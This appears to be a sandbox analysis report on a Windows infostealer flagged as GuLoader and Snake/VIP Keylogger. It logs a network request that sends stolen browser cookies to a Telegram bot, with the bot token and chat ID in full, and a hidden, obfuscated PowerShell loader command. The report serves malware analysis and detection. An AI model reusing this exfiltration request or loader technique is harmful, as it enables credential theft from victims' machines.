Data Ascii: {"ok":true,"result":{"message_id":2592,"from":{"id":7745751910,"is_bot":true,"first_name":"Apache","username":"Chinelo22bot"},"chat":{"id":7695061973,"first_name":"Chinelo","last_name":"Ifebuche","username":"alizzi_22","type":"private"},"date":1736533074,


Session ID: 13
Source IP: 192.168.2.5
Source Port: 50000
Destination IP: 149.154.167.220
Destination Port: 443
PID: 1292
Process: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe

Timestamp / Bytes transferred / Direction / Data:

2025-01-10 18:17:56 UTC, 352 bytes, OUT:
POST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd3298cde51afd
Host: api.telegram.org
Content-Length: 1279

2025-01-10 18:17:56 UTC, 1279 bytes, OUT:
Data Ascii: --------------------------8dd3298cde51afdContent-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:980108Date and Time: 10/01/2025

2025-01-10 18:17:56 UTC, 388 bytes, IN:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 18:17:56 GMT
Content-Type: application/json
Content-Length: 549
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

2025-01-10 18:17:56 UTC, 549 bytes, IN:
Data Ascii: {"ok":true,"result":{"message_id":2593,"from":{"id":7745751910,"is_bot":true,"first_name":"Apache","username":"Chinelo22bot"},"chat":{"id":7695061973,"first_name":"Chinelo","last_name":"Ifebuche","username":"alizzi_22","type":"private"},"date":1736533076,



Target ID: 0
Start time: 13:16:36
Start date: 10/01/2025
Path: C:\Users\user\Desktop\fGu8xWoMrg.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\fGu8xWoMrg.exe"
Imagebase: 0x400000
File size: 1'119'496 bytes
MD5 hash: 487FAD16DA392C87FB894A6CCBD95870
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 13:16:39
Start date: 10/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell.exe -windowstyle hidden "$Subleasing20=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Afsyringer.Una';$Damselflies181=$Subleasing20.SubString(62296,3);.$Damselflies181($Subleasing20) "
Imagebase: 0xed0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2521881649.0000000009B31000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:3
                                                                                                                                                                          Start time:13:16:39
                                                                                                                                                                          Start date:10/01/2025
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:6
                                                                                                                                                                          Start time:13:17:17
                                                                                                                                                                          Start date:10/01/2025
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\Mangedoblende.exe"
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:1'119'496 bytes
                                                                                                                                                                          MD5 hash:487FAD16DA392C87FB894A6CCBD95870
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.3346863955.000000001F3A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 63%, ReversingLabs
                                                                                                                                                                          • Detection: 76%, Virustotal, Browse
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:false

Execution Graph

Execution Coverage: 21.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 17%
Total number of Nodes: 1383
Total number of Limit Nodes: 33

[Execution graph edge listing omitted: the raw node ids, code addresses and per-node Win32 API names (lstrcpynW, FindFirstFileW, CreateFileW, RegOpenKeyExW, and so on) extracted from the report's graph widget; the listing is cut off at the end of this page.]
403913 3811 405ad2 5 API calls 3805->3811 3810 4068d4 5 API calls 3807->3810 3808->3807 3813 4038de 3809->3813 3814 403a9d 3810->3814 3815 403918 lstrcatW 3811->3815 3812->3804 3812->3805 3813->3789 3942 406507 lstrcpynW 3813->3942 3816 403ab2 ExitWindowsEx 3814->3816 3821 403abf 3814->3821 3817 403934 lstrcatW lstrcmpiW 3815->3817 3818 403929 lstrcatW 3815->3818 3816->3802 3816->3821 3817->3789 3819 403954 3817->3819 3818->3817 3822 403960 3819->3822 3823 403959 3819->3823 3825 40140b 2 API calls 3821->3825 3827 405ab5 2 API calls 3822->3827 3826 405a38 4 API calls 3823->3826 3824 4038f1 3943 406507 lstrcpynW 3824->3943 3825->3802 3829 40395e 3826->3829 3830 403965 SetCurrentDirectoryW 3827->3830 3829->3830 3831 403982 3830->3831 3832 403977 3830->3832 3945 406507 lstrcpynW 3831->3945 3944 406507 lstrcpynW 3832->3944 3835 406544 17 API calls 3836 4039c4 DeleteFileW 3835->3836 3837 4039d0 CopyFileW 3836->3837 3842 40398f 3836->3842 3837->3842 3838 403a1a 3840 4062c7 36 API calls 3838->3840 3839 4062c7 36 API calls 3839->3842 3840->3789 3841 406544 17 API calls 3841->3842 3842->3835 3842->3838 3842->3839 3842->3841 3843 405aea 2 API calls 3842->3843 3844 403a04 CloseHandle 3842->3844 3843->3842 3844->3842 3845->3770 3846->3772 3848 40678e 5 API calls 3847->3848 3849 4034d2 3848->3849 3850 4034dc 3849->3850 3851 405dd6 3 API calls 3849->3851 3850->3778 3852 4034e4 3851->3852 3853 405ab5 2 API calls 3852->3853 3854 4034ea 3853->3854 3953 406026 3854->3953 3957 405ff7 GetFileAttributesW CreateFileW 3857->3957 3859 4030bd 3860 4030cd 3859->3860 3958 406507 lstrcpynW 3859->3958 3860->3788 3862 4030e3 3863 405e22 2 API calls 3862->3863 3864 4030e9 3863->3864 3959 406507 lstrcpynW 3864->3959 3866 4030f4 GetFileSize 3881 4031ee 3866->3881 3884 40310b 3866->3884 3868 4031f7 3868->3860 3870 403227 GlobalAlloc 3868->3870 3972 4034af SetFilePointer 3868->3972 3869 403499 ReadFile 3869->3884 3971 4034af SetFilePointer 3870->3971 3872 40325a 3874 403019 6 API calls 3872->3874 
3874->3860 3875 403210 3877 403499 ReadFile 3875->3877 3876 403242 3878 4032b4 35 API calls 3876->3878 3879 40321b 3877->3879 3882 40324e 3878->3882 3879->3860 3879->3870 3880 403019 6 API calls 3880->3884 3960 403019 3881->3960 3882->3860 3882->3882 3883 40328b SetFilePointer 3882->3883 3883->3860 3884->3860 3884->3869 3884->3872 3884->3880 3884->3881 3886 4068d4 5 API calls 3885->3886 3887 403bca 3886->3887 3888 403bd0 3887->3888 3889 403be2 3887->3889 3981 40644e wsprintfW 3888->3981 3890 4063d5 3 API calls 3889->3890 3891 403c12 3890->3891 3893 403c31 lstrcatW 3891->3893 3895 4063d5 3 API calls 3891->3895 3894 403be0 3893->3894 3973 403e8c 3894->3973 3895->3893 3898 405ede 18 API calls 3899 403c63 3898->3899 3900 403cf7 3899->3900 3902 4063d5 3 API calls 3899->3902 3901 405ede 18 API calls 3900->3901 3903 403cfd 3901->3903 3904 403c95 3902->3904 3905 403d0d LoadImageW 3903->3905 3906 406544 17 API calls 3903->3906 3904->3900 3909 403cb6 lstrlenW 3904->3909 3913 405e03 CharNextW 3904->3913 3907 403db3 3905->3907 3908 403d34 RegisterClassW 3905->3908 3906->3905 3912 40140b 2 API calls 3907->3912 3910 403dbd 3908->3910 3911 403d6a SystemParametersInfoW CreateWindowExW 3908->3911 3914 403cc4 lstrcmpiW 3909->3914 3915 403cea 3909->3915 3910->3789 3911->3907 3916 403db9 3912->3916 3917 403cb3 3913->3917 3914->3915 3918 403cd4 GetFileAttributesW 3914->3918 3919 405dd6 3 API calls 3915->3919 3916->3910 3922 403e8c 18 API calls 3916->3922 3917->3909 3921 403ce0 3918->3921 3920 403cf0 3919->3920 3982 406507 lstrcpynW 3920->3982 3921->3915 3925 405e22 2 API calls 3921->3925 3923 403dca 3922->3923 3926 403dd6 ShowWindow 3923->3926 3927 403e59 3923->3927 3925->3915 3928 406864 3 API calls 3926->3928 3929 40563c 5 API calls 3927->3929 3930 403dee 3928->3930 3931 403e5f 3929->3931 3934 403dfc GetClassInfoW 3930->3934 3936 406864 3 API calls 3930->3936 3932 403e63 3931->3932 3933 403e7b 3931->3933 3932->3910 3939 40140b 2 API calls 3932->3939 3935 40140b 2 API calls 3933->3935 
3937 403e10 GetClassInfoW RegisterClassW 3934->3937 3938 403e26 DialogBoxParamW 3934->3938 3935->3910 3936->3934 3937->3938 3940 40140b 2 API calls 3938->3940 3939->3910 3940->3910 3941->3776 3942->3824 3943->3791 3944->3831 3945->3842 3947 403af4 3946->3947 3948 403ae6 CloseHandle 3946->3948 3984 403b21 3947->3984 3948->3947 3951 405c13 67 API calls 3952 403a28 OleUninitialize 3951->3952 3952->3798 3952->3799 3954 406033 GetTickCount GetTempFileNameW 3953->3954 3955 4034f5 3954->3955 3956 406069 3954->3956 3955->3778 3956->3954 3956->3955 3957->3859 3958->3862 3959->3866 3961 403022 3960->3961 3962 40303a 3960->3962 3963 403032 3961->3963 3964 40302b DestroyWindow 3961->3964 3965 403042 3962->3965 3966 40304a GetTickCount 3962->3966 3963->3868 3964->3963 3967 406910 2 API calls 3965->3967 3968 403058 CreateDialogParamW ShowWindow 3966->3968 3969 40307b 3966->3969 3970 403048 3967->3970 3968->3969 3969->3868 3970->3868 3971->3876 3972->3875 3974 403ea0 3973->3974 3983 40644e wsprintfW 3974->3983 3976 403f11 3977 403f45 18 API calls 3976->3977 3979 403f16 3977->3979 3978 403c41 3978->3898 3979->3978 3980 406544 17 API calls 3979->3980 3980->3979 3981->3894 3982->3900 3983->3976 3985 403b2f 3984->3985 3986 403af9 3985->3986 3987 403b34 FreeLibrary GlobalFree 3985->3987 3986->3951 3987->3986 3987->3987 4448 401b77 4449 402da6 17 API calls 4448->4449 4450 401b7e 4449->4450 4451 402d84 17 API calls 4450->4451 4452 401b87 wsprintfW 4451->4452 4453 402c2a 4452->4453 4454 40167b 4455 402da6 17 API calls 4454->4455 4456 401682 4455->4456 4457 402da6 17 API calls 4456->4457 4458 40168b 4457->4458 4459 402da6 17 API calls 4458->4459 4460 401694 MoveFileW 4459->4460 4461 4016a7 4460->4461 4467 4016a0 4460->4467 4462 4022f6 4461->4462 4463 40683d 2 API calls 4461->4463 4465 4016b6 4463->4465 4464 401423 24 API calls 4464->4462 4465->4462 4466 4062c7 36 API calls 4465->4466 4466->4467 4467->4464 4468 406bfe 4469 406a82 4468->4469 4470 4073ed 4469->4470 4471 406b03 GlobalFree 
4469->4471 4472 406b0c GlobalAlloc 4469->4472 4473 406b83 GlobalAlloc 4469->4473 4474 406b7a GlobalFree 4469->4474 4471->4472 4472->4469 4472->4470 4473->4469 4473->4470 4474->4473 4475 4019ff 4476 402da6 17 API calls 4475->4476 4477 401a06 4476->4477 4478 402da6 17 API calls 4477->4478 4479 401a0f 4478->4479 4480 401a16 lstrcmpiW 4479->4480 4481 401a28 lstrcmpW 4479->4481 4482 401a1c 4480->4482 4481->4482 4483 4022ff 4484 402da6 17 API calls 4483->4484 4485 402305 4484->4485 4486 402da6 17 API calls 4485->4486 4487 40230e 4486->4487 4488 402da6 17 API calls 4487->4488 4489 402317 4488->4489 4490 40683d 2 API calls 4489->4490 4491 402320 4490->4491 4492 402331 lstrlenW lstrlenW 4491->4492 4493 402324 4491->4493 4495 405569 24 API calls 4492->4495 4494 405569 24 API calls 4493->4494 4496 40232c 4493->4496 4494->4496 4497 40236f SHFileOperationW 4495->4497 4497->4493 4497->4496 4498 401000 4499 401037 BeginPaint GetClientRect 4498->4499 4500 40100c DefWindowProcW 4498->4500 4502 4010f3 4499->4502 4503 401179 4500->4503 4504 401073 CreateBrushIndirect FillRect DeleteObject 4502->4504 4505 4010fc 4502->4505 4504->4502 4506 401102 CreateFontIndirectW 4505->4506 4507 401167 EndPaint 4505->4507 4506->4507 4508 401112 6 API calls 4506->4508 4507->4503 4508->4507 4509 401d81 4510 401d94 GetDlgItem 4509->4510 4511 401d87 4509->4511 4513 401d8e 4510->4513 4512 402d84 17 API calls 4511->4512 4512->4513 4514 401dd5 GetClientRect LoadImageW SendMessageW 4513->4514 4515 402da6 17 API calls 4513->4515 4517 401e33 4514->4517 4519 401e3f 4514->4519 4515->4514 4518 401e38 DeleteObject 4517->4518 4517->4519 4518->4519 4520 401503 4521 40150b 4520->4521 4523 40151e 4520->4523 4522 402d84 17 API calls 4521->4522 4522->4523 4524 402383 4525 40238a 4524->4525 4528 40239d 4524->4528 4526 406544 17 API calls 4525->4526 4527 402397 4526->4527 4529 405b67 MessageBoxIndirectW 4527->4529 4529->4528 4530 402c05 SendMessageW 4531 402c2a 4530->4531 4532 402c1f InvalidateRect 4530->4532 4532->4531 
3639 40248a 3640 402da6 17 API calls 3639->3640 3641 40249c 3640->3641 3642 402da6 17 API calls 3641->3642 3643 4024a6 3642->3643 3656 402e36 3643->3656 3646 40292e 3647 4024de 3649 4024ea 3647->3649 3681 402d84 3647->3681 3648 402da6 17 API calls 3651 4024d4 lstrlenW 3648->3651 3650 402509 RegSetValueExW 3649->3650 3660 4032b4 3649->3660 3654 40251f RegCloseKey 3650->3654 3651->3647 3654->3646 3657 402e51 3656->3657 3684 4063a2 3657->3684 3661 4032cd 3660->3661 3662 4032f8 3661->3662 3698 4034af SetFilePointer 3661->3698 3688 403499 3662->3688 3666 403423 3666->3650 3667 403315 GetTickCount 3677 403328 3667->3677 3668 403439 3669 40343d 3668->3669 3673 403455 3668->3673 3670 403499 ReadFile 3669->3670 3670->3666 3671 403499 ReadFile 3671->3673 3672 403499 ReadFile 3672->3677 3673->3666 3673->3671 3674 4060a9 WriteFile 3673->3674 3674->3673 3676 40338e GetTickCount 3676->3677 3677->3666 3677->3672 3677->3676 3678 4033b7 MulDiv wsprintfW 3677->3678 3680 4060a9 WriteFile 3677->3680 3691 406a4f 3677->3691 3679 405569 24 API calls 3678->3679 3679->3677 3680->3677 3682 406544 17 API calls 3681->3682 3683 402d99 3682->3683 3683->3649 3685 4063b1 3684->3685 3686 4024b6 3685->3686 3687 4063bc RegCreateKeyExW 3685->3687 3686->3646 3686->3647 3686->3648 3687->3686 3689 40607a ReadFile 3688->3689 3690 403303 3689->3690 3690->3666 3690->3667 3690->3668 3692 406a74 3691->3692 3695 406a7c 3691->3695 3692->3677 3693 406b03 GlobalFree 3694 406b0c GlobalAlloc 3693->3694 3694->3692 3694->3695 3695->3692 3695->3693 3695->3694 3696 406b83 GlobalAlloc 3695->3696 3697 406b7a GlobalFree 3695->3697 3696->3692 3696->3695 3697->3696 3698->3662 4540 40290b 4541 402da6 17 API calls 4540->4541 4542 402912 FindFirstFileW 4541->4542 4543 40293a 4542->4543 4546 402925 4542->4546 4548 40644e wsprintfW 4543->4548 4545 402943 4549 406507 lstrcpynW 4545->4549 4548->4545 4549->4546 4550 40190c 4551 401943 4550->4551 4552 402da6 17 API calls 4551->4552 4553 401948 4552->4553 4554 405c13 67 API calls 
4553->4554 4555 401951 4554->4555 4556 40490d 4557 404943 4556->4557 4558 40491d 4556->4558 4560 4044ca 8 API calls 4557->4560 4559 404463 18 API calls 4558->4559 4561 40492a SetDlgItemTextW 4559->4561 4562 40494f 4560->4562 4561->4557 4563 40190f 4564 402da6 17 API calls 4563->4564 4565 401916 4564->4565 4566 405b67 MessageBoxIndirectW 4565->4566 4567 40191f 4566->4567 4568 401491 4569 405569 24 API calls 4568->4569 4570 401498 4569->4570 4571 402891 4572 402898 4571->4572 4574 402ba9 4571->4574 4573 402d84 17 API calls 4572->4573 4575 40289f 4573->4575 4576 4028ae SetFilePointer 4575->4576 4576->4574 4577 4028be 4576->4577 4579 40644e wsprintfW 4577->4579 4579->4574 4580 401f12 4581 402da6 17 API calls 4580->4581 4582 401f18 4581->4582 4583 402da6 17 API calls 4582->4583 4584 401f21 4583->4584 4585 402da6 17 API calls 4584->4585 4586 401f2a 4585->4586 4587 402da6 17 API calls 4586->4587 4588 401f33 4587->4588 4589 401423 24 API calls 4588->4589 4590 401f3a 4589->4590 4597 405b2d ShellExecuteExW 4590->4597 4592 401f82 4593 40292e 4592->4593 4594 40697f 5 API calls 4592->4594 4595 401f9f CloseHandle 4594->4595 4595->4593 4597->4592 4598 402f93 4599 402fa5 SetTimer 4598->4599 4600 402fbe 4598->4600 4599->4600 4601 403013 4600->4601 4602 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4600->4602 4602->4601 4603 401d17 4604 402d84 17 API calls 4603->4604 4605 401d1d IsWindow 4604->4605 4606 401a20 4605->4606 4607 404599 lstrcpynW lstrlenW 4608 401b9b 4609 401bec 4608->4609 4614 401ba8 4608->4614 4610 401c16 GlobalAlloc 4609->4610 4611 401bf1 4609->4611 4612 406544 17 API calls 4610->4612 4621 40239d 4611->4621 4629 406507 lstrcpynW 4611->4629 4616 401c31 4612->4616 4613 406544 17 API calls 4617 402397 4613->4617 4614->4616 4618 401bbf 4614->4618 4616->4613 4616->4621 4622 405b67 MessageBoxIndirectW 4617->4622 4627 406507 lstrcpynW 4618->4627 4619 401c03 GlobalFree 4619->4621 4622->4621 4623 401bce 4628 406507 lstrcpynW 4623->4628 4625 401bdd 4630 406507 
lstrcpynW 4625->4630 4627->4623 4628->4625 4629->4619 4630->4621 4631 40261c 4632 402da6 17 API calls 4631->4632 4633 402623 4632->4633 4636 405ff7 GetFileAttributesW CreateFileW 4633->4636 4635 40262f 4636->4635 4028 40259e 4039 402de6 4028->4039 4031 402d84 17 API calls 4032 4025b1 4031->4032 4033 4025d9 RegEnumValueW 4032->4033 4034 4025cd RegEnumKeyW 4032->4034 4037 40292e 4032->4037 4035 4025f5 RegCloseKey 4033->4035 4036 4025ee 4033->4036 4034->4035 4035->4037 4036->4035 4040 402da6 17 API calls 4039->4040 4041 402dfd 4040->4041 4042 406374 RegOpenKeyExW 4041->4042 4043 4025a8 4042->4043 4043->4031 4644 40149e 4645 4014ac PostQuitMessage 4644->4645 4646 40239d 4644->4646 4645->4646 4647 404622 4648 40463a 4647->4648 4655 404754 4647->4655 4652 404463 18 API calls 4648->4652 4649 4047be 4650 404888 4649->4650 4651 4047c8 GetDlgItem 4649->4651 4658 4044ca 8 API calls 4650->4658 4653 4047e2 4651->4653 4654 404849 4651->4654 4657 4046a1 4652->4657 4653->4654 4662 404808 SendMessageW LoadCursorW SetCursor 4653->4662 4654->4650 4663 40485b 4654->4663 4655->4649 4655->4650 4656 40478f GetDlgItem SendMessageW 4655->4656 4680 404485 KiUserCallbackDispatcher 4656->4680 4660 404463 18 API calls 4657->4660 4661 404883 4658->4661 4665 4046ae CheckDlgButton 4660->4665 4681 4048d1 4662->4681 4667 404871 4663->4667 4668 404861 SendMessageW 4663->4668 4664 4047b9 4670 4048ad SendMessageW 4664->4670 4678 404485 KiUserCallbackDispatcher 4665->4678 4667->4661 4669 404877 SendMessageW 4667->4669 4668->4667 4669->4661 4670->4649 4673 4046cc GetDlgItem 4679 404498 SendMessageW 4673->4679 4675 4046e2 SendMessageW 4676 404708 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4675->4676 4677 4046ff GetSysColor 4675->4677 4676->4661 4677->4676 4678->4673 4679->4675 4680->4664 4684 405b2d ShellExecuteExW 4681->4684 4683 404837 LoadCursorW SetCursor 4683->4654 4684->4683 3443 4015a3 3444 402da6 17 API calls 3443->3444 3445 4015aa SetFileAttributesW 3444->3445 3446 4015bc 
3445->3446 3556 401fa4 3557 402da6 17 API calls 3556->3557 3558 401faa 3557->3558 3559 405569 24 API calls 3558->3559 3560 401fb4 3559->3560 3571 405aea CreateProcessW 3560->3571 3565 401fcf 3567 401fd4 3565->3567 3568 401fdf 3565->3568 3566 40292e 3579 40644e wsprintfW 3567->3579 3570 401fdd CloseHandle 3568->3570 3570->3566 3572 401fba 3571->3572 3573 405b1d CloseHandle 3571->3573 3572->3566 3572->3570 3574 40697f WaitForSingleObject 3572->3574 3573->3572 3575 406999 3574->3575 3576 4069ab GetExitCodeProcess 3575->3576 3580 406910 3575->3580 3576->3565 3579->3570 3581 40692d PeekMessageW 3580->3581 3582 406923 DispatchMessageW 3581->3582 3583 40693d WaitForSingleObject 3581->3583 3582->3581 3583->3575 3584 4056a8 3585 405852 3584->3585 3586 4056c9 GetDlgItem GetDlgItem GetDlgItem 3584->3586 3588 405883 3585->3588 3589 40585b GetDlgItem CreateThread CloseHandle 3585->3589 3629 404498 SendMessageW 3586->3629 3591 4058ae 3588->3591 3593 4058d3 3588->3593 3594 40589a ShowWindow ShowWindow 3588->3594 3589->3588 3632 40563c OleInitialize 3589->3632 3590 405739 3598 405740 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3590->3598 3592 40590e 3591->3592 3595 4058c2 3591->3595 3596 4058e8 ShowWindow 3591->3596 3592->3593 3606 40591c SendMessageW 3592->3606 3597 4044ca 8 API calls 3593->3597 3631 404498 SendMessageW 3594->3631 3600 40443c SendMessageW 3595->3600 3602 405908 3596->3602 3603 4058fa 3596->3603 3601 4058e1 3597->3601 3604 405792 SendMessageW SendMessageW 3598->3604 3605 4057ae 3598->3605 3600->3593 3608 40443c SendMessageW 3602->3608 3607 405569 24 API calls 3603->3607 3604->3605 3609 4057c1 3605->3609 3610 4057b3 SendMessageW 3605->3610 3606->3601 3611 405935 CreatePopupMenu 3606->3611 3607->3602 3608->3592 3612 404463 18 API calls 3609->3612 3610->3609 3613 406544 17 API calls 3611->3613 3615 4057d1 3612->3615 3614 405945 AppendMenuW 3613->3614 3616 405962 GetWindowRect 3614->3616 3617 405975 TrackPopupMenu 3614->3617 3618 4057da ShowWindow 
3615->3618 3619 40580e GetDlgItem SendMessageW 3615->3619 3616->3617 3617->3601 3620 405990 3617->3620 3621 4057f0 ShowWindow 3618->3621 3622 4057fd 3618->3622 3619->3601 3623 405835 SendMessageW SendMessageW 3619->3623 3624 4059ac SendMessageW 3620->3624 3621->3622 3630 404498 SendMessageW 3622->3630 3623->3601 3624->3624 3625 4059c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3624->3625 3627 4059ee SendMessageW 3625->3627 3627->3627 3628 405a17 GlobalUnlock SetClipboardData CloseClipboard 3627->3628 3628->3601 3629->3590 3630->3619 3631->3591 3633 4044af SendMessageW 3632->3633 3634 40565f 3633->3634 3637 401389 2 API calls 3634->3637 3638 405686 3634->3638 3635 4044af SendMessageW 3636 405698 CoUninitialize 3635->3636 3637->3634 3638->3635 4685 40202a 4686 402da6 17 API calls 4685->4686 4687 402031 4686->4687 4688 4068d4 5 API calls 4687->4688 4689 402040 4688->4689 4690 4020cc 4689->4690 4691 40205c GlobalAlloc 4689->4691 4691->4690 4692 402070 4691->4692 4693 4068d4 5 API calls 4692->4693 4694 402077 4693->4694 4695 4068d4 5 API calls 4694->4695 4696 402081 4695->4696 4696->4690 4700 40644e wsprintfW 4696->4700 4698 4020ba 4701 40644e wsprintfW 4698->4701 4700->4698 4701->4690 4702 40252a 4703 402de6 17 API calls 4702->4703 4704 402534 4703->4704 4705 402da6 17 API calls 4704->4705 4706 40253d 4705->4706 4707 402548 RegQueryValueExW 4706->4707 4709 40292e 4706->4709 4708 402568 4707->4708 4710 40256e RegCloseKey 4707->4710 4708->4710 4713 40644e wsprintfW 4708->4713 4710->4709 4713->4710 4714 404caa 4715 404cd6 4714->4715 4716 404cba 4714->4716 4718 404d09 4715->4718 4719 404cdc SHGetPathFromIDListW 4715->4719 4725 405b4b GetDlgItemTextW 4716->4725 4721 404cec 4719->4721 4724 404cf3 SendMessageW 4719->4724 4720 404cc7 SendMessageW 4720->4715 4722 40140b 2 API calls 4721->4722 4722->4724 4724->4718 4725->4720 4726 4021aa 4727 402da6 17 API calls 4726->4727 4728 4021b1 4727->4728 4729 402da6 17 API calls 4728->4729 4730 4021bb 4729->4730 4731 402da6 17 
API calls 4730->4731 4732 4021c5 4731->4732 4733 402da6 17 API calls 4732->4733 4734 4021cf 4733->4734 4735 402da6 17 API calls 4734->4735 4736 4021d9 4735->4736 4737 402218 CoCreateInstance 4736->4737 4738 402da6 17 API calls 4736->4738 4741 402237 4737->4741 4738->4737 4739 401423 24 API calls 4740 4022f6 4739->4740 4741->4739 4741->4740 4742 401a30 4743 402da6 17 API calls 4742->4743 4744 401a39 ExpandEnvironmentStringsW 4743->4744 4745 401a4d 4744->4745 4747 401a60 4744->4747 4746 401a52 lstrcmpW 4745->4746 4745->4747 4746->4747 3744 4023b2 3745 4023c0 3744->3745 3746 4023ba 3744->3746 3748 402da6 17 API calls 3745->3748 3750 4023ce 3745->3750 3747 402da6 17 API calls 3746->3747 3747->3745 3748->3750 3749 402da6 17 API calls 3753 4023e5 WritePrivateProfileStringW 3749->3753 3751 402da6 17 API calls 3750->3751 3752 4023dc 3750->3752 3751->3752 3752->3749 4760 402434 4761 402467 4760->4761 4762 40243c 4760->4762 4763 402da6 17 API calls 4761->4763 4764 402de6 17 API calls 4762->4764 4765 40246e 4763->4765 4766 402443 4764->4766 4771 402e64 4765->4771 4768 402da6 17 API calls 4766->4768 4770 40247b 4766->4770 4769 402454 RegDeleteValueW RegCloseKey 4768->4769 4769->4770 4772 402e78 4771->4772 4774 402e71 4771->4774 4772->4774 4775 402ea9 4772->4775 4774->4770 4776 406374 RegOpenKeyExW 4775->4776 4777 402ed7 4776->4777 4778 402ee7 RegEnumValueW 4777->4778 4779 402f0a 4777->4779 4786 402f81 4777->4786 4778->4779 4780 402f71 RegCloseKey 4778->4780 4779->4780 4781 402f46 RegEnumKeyW 4779->4781 4782 402f4f RegCloseKey 4779->4782 4784 402ea9 6 API calls 4779->4784 4780->4786 4781->4779 4781->4782 4783 4068d4 5 API calls 4782->4783 4785 402f5f 4783->4785 4784->4779 4785->4786 4787 402f63 RegDeleteKeyW 4785->4787 4786->4774 4787->4786 4795 401735 4796 402da6 17 API calls 4795->4796 4797 40173c SearchPathW 4796->4797 4798 401757 4797->4798 4799 401d38 4800 402d84 17 API calls 4799->4800 4801 401d3f 4800->4801 4802 402d84 17 API calls 4801->4802 4803 401d4b GetDlgItem 
4802->4803 4804 402638 4803->4804 4805 4014b8 4806 4014be 4805->4806 4807 401389 2 API calls 4806->4807 4808 4014c6 4807->4808 4816 40263e 4817 402652 4816->4817 4818 40266d 4816->4818 4821 402d84 17 API calls 4817->4821 4819 402672 4818->4819 4820 40269d 4818->4820 4822 402da6 17 API calls 4819->4822 4823 402da6 17 API calls 4820->4823 4828 402659 4821->4828 4824 402679 4822->4824 4825 4026a4 lstrlenW 4823->4825 4833 406529 WideCharToMultiByte 4824->4833 4825->4828 4827 40268d lstrlenA 4827->4828 4829 4026e7 4828->4829 4830 4026d1 4828->4830 4832 4060d8 5 API calls 4828->4832 4830->4829 4831 4060a9 WriteFile 4830->4831 4831->4829 4832->4830 4833->4827

Control-flow Graph (function at 004034f7; legend: Executed / Not Executed; edge list omitted)
APIs
• SetErrorMode.KERNELBASE(00008001), ref: 0040351A
• GetVersionExW.KERNEL32(?), ref: 00403543
• GetVersionExW.KERNEL32(0000011C), ref: 0040355A
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
• #17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
• OleInitialize.OLE32(00000000), ref: 00403634
• SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
• GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
